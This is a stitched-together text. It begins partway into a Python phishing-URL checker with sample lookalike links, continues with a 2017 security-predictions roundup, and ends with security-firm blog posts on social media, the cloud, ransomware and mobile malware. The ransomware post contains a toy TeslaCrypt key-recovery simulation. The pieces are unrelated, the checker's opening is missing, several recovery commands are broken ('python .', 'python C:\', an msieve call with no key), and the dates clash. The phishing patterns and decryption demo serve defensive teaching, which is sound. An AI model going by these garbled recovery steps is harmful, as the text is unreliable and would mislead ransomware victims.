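TRUSTED = {"yahoo.com"}   # assumption for the demo; replace with your own sites


def parse_host(url: str):
    """Return (scheme, hostname, has_userinfo); a missing scheme is assumed http."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".").lower()
    return parts.scheme.lower(), host, parts.username is not None


def is_trusted(host: str, trusted=TRUSTED) -> bool:
    """Exact match or a real subdomain (mail.yahoo.com yes, yahoo.com.evil.example no)."""
    return any(host == d or host.endswith("." + d) for d in trusted)


def phishing_indicators(url: str, trusted=TRUSTED) -> list:
    """List the reasons a URL looks fake; empty means a trusted site over HTTPS."""
    try:
        scheme, host, userinfo = parse_host(url)
    except ValueError:
        return ["unparseable URL"]
    if not host:
        return ["no hostname"]
    reasons = []
    if scheme != "https":
        reasons.append("not HTTPS")
    if userinfo:
        # Browsers treat everything before '@' as a login name, not the site.
        reasons.append("text before '@' is a username, not the site; real host is " + host)
    try:
        ipaddress.ip_address(host)
        reasons.append("raw IP address instead of a domain name")
    except ValueError:
        pass
    if not host.isascii():
        reasons.append("non-ASCII characters in hostname (possible homograph)")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label in hostname (possible homograph)")
    if not is_trusted(host, trusted):
        reasons.append(f"host {host!r} is not a trusted domain")
        for d in trusted:
            if d.split(".")[0] in host:   # trusted brand embedded in a foreign host
                reasons.append(f"host imitates {d}")
                break
    return reasons


# Constructed sample links, the kind that arrive in a phishing email.
SAMPLE_LINKS = [
    "https://mail.yahoo.com/login",              # genuine
    "http://yahoo.com.account-verify.example/",  # trusted name used as a prefix
    "https://yahoo.com@198.51.100.7/",           # userinfo trick plus raw IP
    "https://xn--yho-tka.com/",                  # punycode lookalike
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(link, "->", phishing_indicators(link) or ["looks genuine"])
```

The subdomain test is deliberately strict: only a host that ends in ".yahoo.com" counts, so "yahoo.com.account-verify.example" is flagged even though the trusted name appears in it. A production version would also consult the public suffix list, since "endswith" alone cannot tell co.uk-style registrable domains apart.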

2017 Attack Forecast From Industry Partners

At the beginning of this year, I answered the question: Why more security predictions and how can you benefit? At the end of that article, I told readers to expect even more security predictions as we head into 2017. That has turned out to be true — with a twist.

No doubt, there are more lists looking toward the future than ever before. As I examined hundreds of technology and security articles, blogs, slideshows, videos and infographics related to upcoming 2017 events, I’ve seen a growing number of organizations prefer to name their views on the coming year as “forecasts” or “trends” or “projections.” I suppose that a “forecast” does sound more scientific — like a weather forecast that is based on mathematical models, satellites, radar and much more.



What is quite clear is that these lists contain a wide variety of content that ranges from hopes (you might even call them New Year's resolutions based on what vendors are already working on) to connecting-the-dots threat projections (based on 2015 and 2016 data) to educated guesses on security to dramatic cyberspeculations that get media attention. Security predictions are also showing up on other lists from automobile announcements to defense spending to the home toy market.

Nevertheless, I maintain my view that the security and technology industries offer tremendous value with these cyber research reports and expert analysis on threats from their best and brightest. I strongly urge technology and security pros to review these referenced lists and check them twice, in order to improve your strategic plans, product road maps, incident response scenarios and overall business operation.

 For background and comparison purposes, here's a reminder of the top 15 security predictions for 2015 and the top 16 security predictions for 2016. On a personal level, understanding online risk trends within your industry is a must for ongoing career growth and maintaining security thought-leadership as well as to enable workable technology solutions.

So here’s my “Guide to 2017 Security Predictions,” for readers who want to see the specific company prediction details as we head toward New Year’s Day 2017. If you want to jump to conclusions, my cyberprediction award-winners follow at the end.

The Top 17 Security Predictions by Company

1) Symantec — The three lists of predictions that are offered by Symantec are very similar to the lists offered by others, so I offer them here (with details at their website):

Cloud Generation dynamics define the future of the enterprise

- The enterprise network will expand and become increasingly undefined and diffuse.

- Ransomware will attack the cloud.

- AI/machine learning will require sophisticated big data capabilities.

Cybercrime becomes mainstream

- Rogue nation states will finance themselves by stealing money.

- Fileless malware will increase.

- Secure Sockets Layer (SSL) abuse will lead to increased phishing sites using HTTPS.

- Drones will be used for espionage and explosive attacks.

IoT comes to enterprise business

- The proliferation of the Cloud Generation.

- IoT devices will increasingly penetrate the enterprise, leading to increased IoT DDoS attacks.

2) Trend Micro — The list of eight security predictions offered by Trend Micro doesn’t contain any “wows,” but the explanations are again very helpful, offering in-depth explanations. Unlike some other companies, they think ransomware will plateau, but “attack methods and targets will diversify.”

They also predict that “Adobe and Apple will outpace Microsoft in terms of platform vulnerability discoveries.”

They also call out increasing “cyberpropaganda” as the use of tools and methods to influence elections and public opinion. “Most recently, we have seen platforms like WikiLeaks used for propaganda — with highly compromising materials leaked through the site just a week before the US elections. In our continuous monitoring of the cybercriminal underground, we also noted script kiddies advertise their earnings from fake election-related news. They claim to make around US$20 per month by driving traffic to fabricated smear content about electoral candidates.”

3) McAfee — This excellent white paper (in PDF format) offered by McAfee covers a wide range of trends and 2017 predictions that are worth noting. Here are a few highlights from their 14 predictions:

- Ransomware will remain a very significant threat until the second half of 2017. Ransomware-as-a-service, custom ransomware for sale in dark markets, and creative derivatives from open source ransomware code will keep the security industry busy through the first half of the year. Ransomware’s impact across all sectors and geographies will force the security industry to take decisive actions. We predict that initiatives like the No More Ransom! collaboration, the development and release of anti-ransomware technologies, and continued law enforcement actions will reduce the volume and effectiveness of ransomware attacks by the end of 2017.

- “Dronejacking” places threats in the sky

- IoT malware opens a backdoor into the home

- Machine learning accelerates social engineering attacks

- The explosion in fake ads and purchased “likes” erodes trust

- Hacktivists expose privacy issues

- Threat intelligence sharing makes great strides

 4) Forcepoint — There are 10 Forcepoint predictions, and like many other companies, they offer a webcast and a downloadable document with details. A few of their highlights include:

- Compliance & Data Protection Convergence — 2017 will be the final full year before the European Union’s (EU) General Data Protection Regulation (GDPR) is a legal requirement. GDPR demands may drive business costs higher as new data protection controls are applied and multiple stakeholders grapple with the who, when and how of data accessibility requirements.

- Rise of the Corporate Incentivized Insider Threat — A new corporate-incentivized insider threat may clash with customer data, corporate profit and other performance goals, forcing businesses to re-evaluate their corporate environments and growth strategies.

- Voice-first Platforms & Command Sharing — The rise of voice-activated AI to access Web, data and apps will open up creative new attack vectors and data privacy concerns.

5) FireEye — A slightly different approach was taken by FireEye this year. They offer good questions and related answers regarding 2017. Here are a few highlights:

“In 2017, cyber security battles may favor criminals even more as the Internet of Things (IoT) continues to expand possible avenues of attack. The 2017 security predictions from FireEye include insights on:

- What investments security organizations will make in 2017. Security integration and orchestration should be considered the benchmarks of new technology investment.

- Which industry or type of organization might unexpectedly become a target of threat groups in 2017? Religious institutions in Western countries are at the top of the list because they typically lack a robust security program yet maintain contact information and other sensitive data.

- How threat groups will continue to target industrial control systems (ICS) in the near future? A recent report revealed that security patches were not yet available for more than 30% of identified ICS vulnerabilities.”

 6) Kaspersky — Kaspersky Lab predicts that 2017 will continue to see the commodification of financial attacks.

"The commodification of attacks along the lines of the 2016 SWIFT heists — with specialized resources being offered for sale in underground forums or through as-a-service schemes, will continue in 2017. As payment systems become increasingly popular and common, this will be matched by a greater criminal interest next year.

As far as ransomware is concerned, Kaspersky Lab also anticipates the continuing rise of ransomware, but with the unlikely trust relationship between the victim and their attacker — based on the assumption that payment will result in the return of data.”

7) Palo Alto Networks — The list of Palo Alto predictions for 2017 is impressive. Their items are divided into “sure things” and “longshots.” They cover many cyberareas, including our cybertalent shortage.

- A few ‘sure things’ include: “Recruiters Search for Cyber Talent Outside of Security” and “The need for non-technical security professionals will also increase.”

Longshots include: “Companies acquire other organizations to inherit talent.”  

 8) Watchguard Technologies — I really like the various 2017 prediction offerings via several channels from Watchguard Technologies. They offer creative predictions, infographics, YouTube videos on their top predictions and more. Here are two examples:

- First on their Watchguard list is Ransomworm, and this video below describes what that means. They also describe IaaS as an attack platform and surface and new steps in a global cyberwar leading to a civilian casualty.

I also like this infographic listing 2017 predictions from Watchguard Technologies.

9) Imperva — There has consistently been a good list of predictions from Imperva over the years. This year they offer:

- Botnet of Things

- Ghosts from the past

- Cyber Fatigue

10) BeyondTrust — There are 10 cybersecurity predictions offered by BeyondTrust. They lead with this bold item: “The first nation state cyber-attack will be conducted and acknowledged as an act of war.”

They also list Tor v2, cloud-based attacks, and: “Behavioral technologies, such as pressure, typing speed and fingerprints, will be embedded into newly-released technologies.”

11) Checkpoint — There are Checkpoint predictions for mobile, industrial Internet of Things (IIoT), critical infrastructure, threat prevention and the cloud from Checkpoint. “An attack to disrupt or take down a major cloud provider will affect all of their customers’ businesses. While generally disruptive, it would be used as a means to impact a specific competitor or organization, who would be one of many affected, making it difficult to determine motive. There will also be a rise in ransomware attacks impacting cloud-based data centers.”

12) Forrester — The list of 2017 predictions from Forrester covers every major enterprise area, but details need to be purchased. In the cybersecurity area, they predict that risks will intensify. They also say, “Security And Skills Will Temper Growth Of IoT.” (Note that both Gartner and Forrester are using these predictions as lures to buy their more in-depth prediction analysis.)

13) Gartner — Always known for their ability to put percentages next to their predictions, Gartner offered these free security predictions regarding the next 2-4 years several months back. More recently, Gartner offers these free mobile security predictions — with advice attached.

- The first significant finding in the report is that, “Mobile attacks (Pegasus, XcodeGhost) and vulnerabilities (Stagefright, Heartbleed) are increasing in terms of both number and pragmatism.”

- Now is the time to start your Mobile Threat Defense (MTD) initiative.

- No EMM? Mobile Threat Defense protects employees and eliminates privacy concerns.

14) White Hat Security — Some very interesting predictions here, including this one from Dan Lacey:

Nothing will change. “Attackers will continue to discover and exploit zero-days. Companies large and small will continue to lose data and money to the usual attacks, often because they didn’t take basic security precautions. Individuals will continue to lose money in the usual ways, often because they lack basic knowledge of Internet safety. Manufacturers will continue to produce Internet-connected devices with no security, or easily by-passable security, enabling attackers to hijack them. Someone might pass laws mandating that new Internet of Things devices have security, but those laws will be unenforceable and impossible to apply retroactively. No one will deploy a better authentication system than passwords.”

15) Sophos — Here is another example of cybersecurity trends for 2017 from Sophos, which reads a lot like other lists, starting with: “Destructive DDoS IoT attacks will rise.”

But at the same time, they offer this on encryption’s downside: “As encryption becomes ubiquitous, it has become much harder for security products to inspect traffic, making it easier for criminals to sneak through undetected. Unsurprisingly, cybercriminals are using encryption in creative new ways. Security products will need to tightly integrate network and client capabilities, to rapidly recognize security events after code is decrypted on the endpoint.”

16) IDC – And if you are not depressed yet, IDC leads with ‘2017 will be worse in every aspect of information security.’

This report, which was focused on Africa, also predicts more consolidating and outsourcing of security – which seems likely in other parts of the world as well.

17) IBM – The twelve predictions offered by IBM were a mix of industry experts and their own internal security leaders in various industries. They lead with more adoption of intelligence-led approaches to threats. Full disclosure: I am one of the experts included in the IBM list, with one of my predictions regarding fake news and online deception.

And for a few added extra predictions to check out, Dark Reading offers eight bold security predictions, including the LogRhythm prediction from CISO James Carder that the entire Internet will go down for a day. Also on the list – Tripwire’s prediction that 2017 will bring the return of the worm.

I also like Microsoft’s blog describing 17 women with predictions for 2017 and also for 2027.

Other good security prediction write-ups that I’ve seen include: Forbes.com, Betanews, The Register (UK) on hiring, Computerworld, RSA, ITWorldCanada, Gigamon CTO Shehzad Merchant, ESET and Above Security.


2017 Prediction Wrap-Up

Almost everyone is saying that things will get worse in cyberspace before they get better. Most also think we are years away from meaningful, lasting cybersecurity answers. Still, our security industry progress is measured in small victories in many subcategories.

(As a side note, I have decided to cut back on the cyber prediction awards this year, offering only a few closing perspectives and trends regarding industry predictions.)

And yet, here are a few (see details earlier in article):

Most Creative — Watchguard Technology’s ‘Ransomworm’

Most Scary — LogRhythm prediction from CISO James Carder that the entire Internet will go down for a day.

Most Common and Likely — More Internet of Things (IoT) Malware leading to more DDoS attacks. (It’s already happening.)

Most Dull (yet also insightful) — Dan Lacey, White Hat Security: ‘Nothing will change.’

There is no doubt that the most common security predictions include an increase and expansion of cyberthreats against the cloud, more IoT attacks leading to disruptions, more (and different) ransomware and an increase in nation-state/cyberwar issues cutting across international lines.

What's missing? Companies have again held back on predicting a major Cyber Pearl Harbor or Cyber 9/11 type event, but many did predict that cyberterrorism will be growing more destructive in 2017. There is also a lack of government cybersecurity predictions covering what the new Trump Administration might do in the coming year. Finally, I was surprised that we didn't see more of a spotlight on 'bug bounties' or coordinated vulnerability disclosure programs - which I think will surge in government and other industries in the next few years. 

For a wider view on global security trends in 2017, I encourage readers to take a look at the 2017 Global Forecast from the Center for Strategic & International Studies (CSIS). This website offers many in-depth insights, along with a 107-page report that covers many security topics, including cybersecurity.

In conclusion, the cybersecurity market is growing rapidly. According to a market report, “We anticipate 12-15 percent year-over-year growth through 2021. ...

The U.S. government has increased its annual cybersecurity budget by 35 percent, going from $14 billion budgeted in 2016 to $19 billion in 2017. This is a sign of the times and there’s no end in sight. Incremental increases in cyber security spending are not enough. We expect businesses of all sizes and types, and governments globally, to double down on cyber protection.”

So despite some less than encouraging predictions regarding online safety and security, the future looks bright in 2017 for those who can offer workable solutions to solve security problems in cyberspace.

As Thomas Edison reportedly said last century: “Opportunity is missed by most people because it is dressed in overalls and looks like work.”

And, "There's a way to do it better — find it."


Credit to:


Contact us at IDSS to help you protect your data!


UK Cyber Security Meeting

The BBC has published reports on cyber security meetings held to discuss the state of cyber protection in the UK.

As the BBC reported, fears over Russian interference have grown in recent months, amid allegations of meddling in the electoral processes of a number of countries. US intelligence chiefs have accused Moscow of trying to influence November's presidential election in an attempt to boost Donald Trump's chances of beating Hillary Clinton. In December, Germany's domestic intelligence agency claimed Russia was trying to destabilise the country through propaganda and cyber attacks ahead of its general election later this year. And an aide to French presidential candidate Emmanuel Macron recently told reporters the candidate is being targeted by Moscow in a parallel campaign of hacking and fake news.

These types of meetings bring cybersecurity to the front of the media. High-profile meetings like this are great for exposure but terrible for confidence. We as a security firm always review the agenda of these meetings. After reviewing the objectives of this meeting, we have more confidence in our solutions to protect you.

To learn more, contact us at IDSS. We will protect your company and data. 

Contact US !!

Social Media, Friend or Foe?

Facebook had 1.55 billion monthly active users. That is a lot of data.

Social media is a great forum for communicating with your extended family and friends, and a wonderful place to expand your exposure to the world around you. Facebook, Twitter, Instagram and all the other social media sites are ingrained in our daily routine. IDS uses social media for marketing, security write-ups, and exposure. This brought up a good conversation about why social media is such a big market. It is because of the data: collecting it, analyzing trends and user behaviors, and learning about us.

As a security firm focused on protecting data, I began to dig deeper into what type of data is collected. To be honest, most of the data collected is volunteered by the user, through the privacy settings on posts and the search settings. I understand that for a company data is critical and should be protected from unauthorized access. As companies use social media more and more, it has become a concern for me. I asked myself: do companies really understand what they are sharing, and with whom?

Mobile applications help streamline the use of social media platforms. A popular app called "Most Used Words on Facebook" has been shared thousands of times, but media reported that it may be stealing the information of those who use it. The application went viral, collecting massive amounts of data to display word maps. Simple, right? Nothing sensitive. Well, when I looked at the permissions the app requested, I started to be concerned. The application requested access to otherwise private posts, pictures, and tags. It went beyond the Facebook permissions users expected while it collected the data and copied it to another server. How do you feel now? I was very concerned. Who would now have access to this data? What would they do with it?

The app's terms of service state that all of the information it takes will continue to be stored even if you close your account, and they point out that the information could be stored on any of its servers, at any location. Once the company has sold that data on, it gives no protection for how it is used. You have just freely donated your data to an unknown party for the profit of that company.


Contact US To Help protect YOU !

Is the Cloud Safe ?

In recent studies, 49% of decision makers stated they believe cloud services are not secure. Are you part of the 49%? As a security firm, IDS believes that all solutions can be secured. Treating your cloud services the same as on-premise services is critical to your security. If you are outsourcing services to the cloud, you need to take the same proactive steps required for on-premise solutions. Many companies use cloud services for email, document sharing, and collaboration, and Microsoft, Google, Amazon, and many other providers offer them. When reading the SLAs you should notice that these types of services do not accept responsibility for data loss. As a decision maker for your company, that should be a concern: you are trusting a service provider with your critical data. Why not scan the vendor just as you would your dedicated on-premise services?

41% believed that all cloud-based services are ‘inherently insecure’. Is that really the case? The only way to be sure is to take proactive steps to hold the cloud service providers accountable. General opinions of IT are negative, and data breaches are common news in the world we live in. Decision makers for companies need to know what the breaches are, and why the vendor didn't know in advance. Transparency between the client and the vendor's processes would be ideal. You have the freedom to scan the vendors, with the vendor's approval, to proactively maintain security compliance. Scanning your vendors for compliance is not only good practice for your peace of mind, it also maintains the vendor's integrity. This is a "win, win" solution. It also establishes the vendor-to-client relationship as a priority: you are proactively protecting your data and alerting the vendor to vulnerabilities in their services, which allows them to provide better services to all customers.

Now that you understand the importance of securing your data, how do you do it? That is where IDS steps in. We can work with you throughout the process. Scanning cloud services is similar to scanning on-premise services; it just adds a layer of communication with the cloud provider. Don't worry, we can help.


Contact US to help!

Ransomware! Why ME??

Ransomware is malware that encrypts your company's data and holds it hostage in expectation of a payment. The recent wave of variants of the crypto-ransomware family has brought this to the security forefront. As a security professional, I see this more and more frequently. What do you do when you are “crypto'd”?

The easiest resolution is to recover from a backup. Yes, that is one of the reasons every company should have a reliable and secure backup solution. In this model, all that is needed is a restore point, and the files will be restored in their original, unencrypted state. If you don't have a secure backup solution you should

What happens if I do not have a backup? That is where the process gets much more difficult. If you were hit by an older TeslaCrypt 2.x variant (the one that appends the .vvv extension), you have a chance. It is a complicated process, but it can be done: using a Python script on a server, you can run a tool called TeslaDecrypt. This only works for those older versions, but it gives you a chance.

You will need to build and run the tools from a Python back end. Two scripts are needed: one parses the .vvv file headers, identifies their public keys and, for files where the corresponding private key is already known, performs the actual decryption; the other reconstructs the private key from the previously found factors of the public key. Python will need the pycrypto module installed. I recommend using msieve and the wrapper.

What do you need to collect to get started? Collect an encrypted file from the attacked machine. Choose a file whose original format has a known initial magic number; the tool is pre-configured for working with PDF files. Put copies of the files in a secure, isolated folder and leave the originals untouched. The file extension will be .vvv. Once you have these files, run "python ." in the working folder to extract the public key. To factor the public key, run msieve -v -e 0x followed by the public key from the previous step. Then wait. Next, edit the script and add your public and private AES keys to the known_keys array. Repeat until all the found keys have been cycled through. Finally, run "python C:\" to decrypt your files.

I don't want to provide details that will allow developers of malware to reverse engineer the malware, so I will stop there. If you want more information or need to get services completed, contact us. Be aware that depending on the encryption and the processor power of the system, this process can take hours, days, or weeks.
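To make the procedure above concrete, here is an added toy simulation written for this page. It is not the page's tool and not the real TeslaCrypt file format; what it keeps is the weakness the factoring approach relied on: the "public key" stored in each file header was an ordinary (non-modular) integer product involving the file's AES key, so factoring it and trying sub-products against a known file magic (%PDF) recovers the key. Everything else is an assumption constructed for the demo: a tiny header layout, a SHA-256 counter-mode keystream standing in for AES-CBC so no third-party crypto library is needed, and key sizes small enough that trial division replaces msieve.

```python
"""Toy reconstruction of the TeslaCrypt 2.x key-recovery idea.

Added, simplified simulation for this page; NOT the page's tool and NOT the
real TeslaCrypt format.  Constructed assumptions:
  * header layout  b"TOY1" | 2-byte length | big-endian product | ciphertext
  * a SHA-256 counter-mode keystream stands in for AES-CBC
  * tiny keys, so trial division stands in for msieve
"""
import hashlib
import itertools
import struct
from math import prod

HEADER_TAG = b"TOY1"
MAX_KEY_BITS = 16      # stand-in for the 256-bit AES key bound the real tool used
MAGIC = {b"%PDF": "pdf", b"PK\x03\x04": "zip", b"\x89PNG": "png"}


def keystream_xor(key: int, data: bytes) -> bytes:
    """Stand-in cipher: XOR data with SHA-256(key || block counter); symmetric."""
    key_bytes = key.to_bytes(32, "big")
    out = bytearray()
    for offset in range(0, len(data), 32):
        ks = hashlib.sha256(key_bytes + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], ks))
    return bytes(out)


def encrypt_file(plaintext: bytes, key: int, secret: int) -> bytes:
    """Build a toy .vvv-style blob whose header leaks key * secret (the flaw)."""
    product = key * secret
    product_bytes = product.to_bytes((product.bit_length() + 7) // 8, "big")
    header = HEADER_TAG + struct.pack(">H", len(product_bytes)) + product_bytes
    return header + keystream_xor(key, plaintext)


def parse_header(blob: bytes):
    """Return (product, ciphertext); raises ValueError if the tag is wrong."""
    if blob[:4] != HEADER_TAG:
        raise ValueError("not a toy-encrypted file")
    (length,) = struct.unpack(">H", blob[4:6])
    return int.from_bytes(blob[6:6 + length], "big"), blob[6 + length:]


def factor(n: int) -> dict:
    """Trial division -> {prime: exponent}; msieve does this job at real sizes."""
    factors = {}
    p = 2
    while p * p <= n:
        while n % p == 0:
            factors[p] = factors.get(p, 0) + 1
            n //= p
        p += 1 if p == 2 else 2
    if n > 1:
        factors[n] = factors.get(n, 0) + 1
    return factors


def recover_key(blob: bytes, max_key_bits: int = MAX_KEY_BITS):
    """Try every sub-product of the factored header value that fits the key
    size; the one that decrypts the first bytes to a known magic is the key."""
    product, ciphertext = parse_header(blob)
    factors = factor(product)
    primes = list(factors)
    for exps in itertools.product(*(range(factors[p] + 1) for p in primes)):
        candidate = prod(p ** e for p, e in zip(primes, exps))
        if candidate == 1 or candidate.bit_length() > max_key_bits:
            continue
        head = keystream_xor(candidate, ciphertext[:8])
        if any(head.startswith(m) for m in MAGIC):
            return candidate
    return None                     # no sub-product produced a known file type


def decrypt_file(blob: bytes, key: int) -> bytes:
    _, ciphertext = parse_header(blob)
    return keystream_xor(key, ciphertext)


# Constructed demo data: a fake PDF, a small key and a throw-away secret factor.
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
SAMPLE_KEY = 3 * 7 * 13 * 101       # 27573, fits in MAX_KEY_BITS
SAMPLE_SECRET = 11 * 17 * 23        # 4301

if __name__ == "__main__":
    blob = encrypt_file(SAMPLE_PDF, SAMPLE_KEY, SAMPLE_SECRET)
    key = recover_key(blob)
    print("recovered key:", key)
    print(decrypt_file(blob, key)[:8])
```

The magic-number check is why the page says to pick a PDF: without a known plaintext prefix there is no way to tell which sub-product is the real key, and with the wrong key-size bound (try `recover_key(blob, max_key_bits=8)`) the search silently fails. At real sizes the factoring step, not this search, is what takes the hours to weeks mentioned above.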


Contact Us to Help !

Mobile Device Attacks

Mobile Attacks

Mobile malware attacks are on the rise: from 2015 to 2016 the number of these attacks increased by 61%.

Malware Evolves?

Mobile malware is following a similar evolution to desktop malware. It began by attacking through apps downloaded to mobile devices, through SMS links, or through other links the user approves. It still targets, and will always target, user data; attackers are now focusing on collecting banking information.

Popular Attacks

Popular attacks known as the SlemBunk attacks are examples of this evolution. Other attacks on iOS and Android devices, such as XcodeGhost and iBackdoor on iOS, further confirm the evolution of mobile malware.

What can you do?

How will you protect your data on mobile devices in 2016? You need a full-service security software suite. This should protect your mobile device with the same diligence as your laptop or PC. You also need a service to proactively monitor, scan, and alert you to any malware activity.


Contact US to help !

2017 Attack Forecast

A new year brings new attacks.

As a data security firm, we are working to stay one step ahead of the attackers in this evolving landscape, and the companies we work with are trying to stay ahead too. Preparation for security breaches of any type is critical.

IDS is not the only one looking ahead

Experian Data Breach Resolution has released its projected attack forecast for the coming year. While some current issues remain relevant, there are a few emerging areas that warrant attention. The attack vectors have not changed: the cyber criminals are still after the most precious of company assets, the data. The reality is that no two data breaches are the same. It is an evolving form of malicious behavior.

Consumers will be impacted

Experian predicts that consumers and businesses will be collateral damage in cyber-conflicts among countries. As nation-states continue to move their conflicts and espionage efforts to the digital world, we will likely see more incidents aimed at stealing corporate and government secrets or disrupting military operations, causing company exposure in the form of leaked information on millions of individuals or stolen business intellectual property. This is the new age of warfare.

Our Predictions

For 2017, we predict a resurgence in hacktivist activities, motivated by the desire to inflict reputational damage on a company or a cause. These groups are not after the data itself; their behavior is closer to extortion. A company's security response plan needs procedures in place to mitigate this type of exposure. They will utilize ransomware to hold companies or users hostage, forcing them to pay to recover the compromised data.

Be Proactive

The forecast for 2017 is focused on small attacks intended to bring the hacktivist organization fame. Healthcare and credit card hacks make big headlines, but small breaches will cause the most damage. With the presidential campaigns coming up, we at IDS would not be shocked if they became targets for these types of attacks.


Contact Us at IDSS!